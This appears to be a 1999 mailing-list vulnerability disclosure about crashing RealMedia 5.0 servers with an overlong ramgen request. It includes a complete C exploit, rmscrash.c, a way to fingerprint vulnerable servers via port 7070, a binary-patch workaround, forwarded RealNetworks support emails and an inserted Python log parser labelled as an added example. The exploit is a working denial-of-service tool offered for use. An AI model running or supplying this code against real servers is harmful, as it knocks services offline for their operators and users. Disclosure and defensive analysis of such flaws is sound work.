Date: Wed, 22 Dec 1999 22:33:21 -0800
From: bow <[email protected]>
To: [email protected]
Subject: RealMedia Server 5.0 Crasher (rmscrash.c)
RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing
the buffer which stores the ramgen requests.
I emailed RealNetworks about it and they finally got back to me a month and
a half later. Their response was that it's a known issue with 5.0 and the
only way to fix it is to upgrade to 6.0. Of course, upgrading means paying
more money.
I really wish all companies would fully back their COMMERCIAL software and
make patches for previous releases. Oh well.
The exploit is included below. It's been tested on FreeBSD and RealMedia
server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the
person who crashed it in the pnserver error log. It looks like this:
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report
An easy way to tell if a server is running 5.0 is to telnet to the RealMedia port,
usually 7070, and type:
GET /SmpDsBhgRl <enter><enter>
From what I've seen, RealMedia 5.0 servers always return "Server: RealServer 1.0 Beta" in the
headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0".
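As an added example (not part of the original post or of RealNetworks' software), the following Python parses the pnserver error-log sequence shown above into fault events attributed to a client IP, and classifies the Server: header returned by the telnet check; the log lines and the 192.0.2.10 address are constructed sample data.

```python
import re

# Constructed sample of pnserver error-log lines (same shape as the post's; documentation IP).
SAMPLE_LOG = """\
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 192.0.2.10
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report
"""
LINE_RE = re.compile(r"^\*{3}(?P<ts>\S+ \S+) pnserver\((?P<pid>\d+)\): (?P<msg>.*)$")
CAUSE_RE = re.compile(r"Fault caused by type (?P<ctype>\d+) client from (?P<ip>[\d.]+)")

def parse_pnserver_faults(text):
    """One event per 'Attempting Crash Avoidance' trap, with the blamed client
    type/IP and whether a FATAL ERROR followed (i.e. the server went down)."""
    events, current = [], None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a pnserver log record
        msg = m.group("msg")
        if msg.startswith("TRAPPED FAULT: Attempting"):
            current = {"ts": m.group("ts"), "pid": int(m.group("pid")),
                       "client_type": None, "client_ip": None, "fatal": False}
            events.append(current)
        elif current is not None:
            cause = CAUSE_RE.search(msg)
            if cause:
                current["client_type"] = int(cause.group("ctype"))
                current["client_ip"] = cause.group("ip")
            elif msg.startswith("FATAL ERROR"):
                current["fatal"] = True
    return events

def classify_server_header(raw_response):
    """Map the Server: header of the reply to the 'GET /SmpDsBhgRl' check to the
    generation the post describes ('RealServer 1.0 Beta' = 5.0, 'RMServer 1.0' = G2)."""
    for hdr in raw_response.split("\r\n"):
        name, sep, value = hdr.partition(":")
        if sep and name.strip().lower() == "server":
            value = value.strip()
            if value == "RealServer 1.0 Beta":
                return "5.0 (affected)"
            if value == "RMServer 1.0":
                return "G2 (6.0/7.0, fixed)"
            return "unknown: " + value
    return "no Server header"
```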
A hacked-up fix for the problem that I've used is to edit the pnserver binary and change the ramgen
string to something else. This, however, will break the ramgen functionality (which I don't use).
If you are going to rename the ramgen in the binary to something else, make sure it matches the string
length of 6.
-bow
-- START OF RMSCRASH.C --
/*
* rmscrash.c - [email protected]
*
* Crash a RealMedia 5.0 server by sending a very long ramgen request.
*
* Test on:
* $ pnserver -v
* Version: 5.0-rvserver-build-290
* Platform: FreeBSD-2.1.x
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BUFLEN 4082

char buf[BUFLEN+14];   /* request path plus trailing " HTTP/1.1\r\n\r\n" and NUL */
int sock;
struct sockaddr_in sa;
struct hostent *hp;

int main (int argc, char *argv[]) {
    int port;

    if (argc < 3) {
        printf("Usage: %s realserver port\n",argv[0]);
        exit(-1);
    }
    port = atoi(argv[2]);

    /* fill the request with 'A's, then put the ramgen path at the front
       and the HTTP trailer at the end */
    memset(buf,0x41,BUFLEN);
    memcpy(buf,"GET /ramgen/",12);
    memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);

    if ((hp=gethostbyname(argv[1]))==NULL) {
        perror("gethostbyname()");
        exit(0);
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("socket()");
        exit(0);
    }
    sa.sin_family=AF_INET;
    sa.sin_port=htons(port);
    memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
        perror("connect()");
        exit(0);
    }
    printf("Connected to %s. Sending data\n",argv[1]);
    write(sock,buf,strlen(buf));
    printf("Done.\n");
    close(sock);
    return 0;
}
--- END OF RMSCRASH.C ---
----- Forwarded message from [email protected] -----
From: [email protected]
Date: Wed, 22 Dec 1999 10:14:57 -0800
Subject: Re: max the ramgen buffer [#7570768]
To: [email protected]
X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016
Hello Bow,
No, unfortunately there is not. The solution is to upgrade to 6.0 or 7.0.
Best wishes,
Kim
~~~~~~~~~~~~~~~~~~~~
Kimberly Ayars
SDK Support Engineer
------- Original Message --------
>From: [email protected]
>To: [email protected]
>Subject: Re: max the ramgen buffer [#7570768]
>Date: 12/21/99 16:58:20
>
>
>Well is there a fix for this in the 5.0 server??
>
>-bow
>
>On Tue, Dec 21, 1999 at 04:52:07PM -0800, [email protected] wrote:
>> Hello Bow,
>>
>> First of all, I apologize for the delay in responding. Thank you so much for your patience.
>>
>> This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers.
>>
>> Best wishes,
>> Kim
>> ~~~~~~~~~~~~~~~~~~~~
>> Kimberly Ayars
>> SDK Support Engineer
>> ------- Original Message --------
>> >From: [email protected]
>> >To: [email protected]
>> >Subject: max the ramgen buffer
>> >Date: 11/06/99 04:10:46
>> >
>> >
>> > Making a request to the Real5 server with a long (~4040 bytes) request will crash the server. Is this a known issue?
>> >
>> >***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report
>> >***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report:
>> >5.0-rvserver-build-290
>> >FreeBSD-2.1.x
>> >
>> >
>> >Do you guys have an updated Real5 server?
>> >
>> >
>> THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
>>
>>
>> Copyright (c) RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc.
>>
>>
>> ---------------------
>> Instructions to Reply
>> ---------------------
>>
>>
>> Your Incident ID number for this request is 7570768
>>
>> To reply to this message you may simply reply to this email. (Please do not modify the subject line)
>>
>> To view all activity on this ticket go to the following URL. You will also be able to reply from there.
>>
>>
>> http://customerrelations.real.com/scripts/rnforms/loginpage.asp
>>
>>
>> To verify your identity, you will be prompted for this Incident ID number and your email address.
>>
>>
>
>
----- End forwarded message -----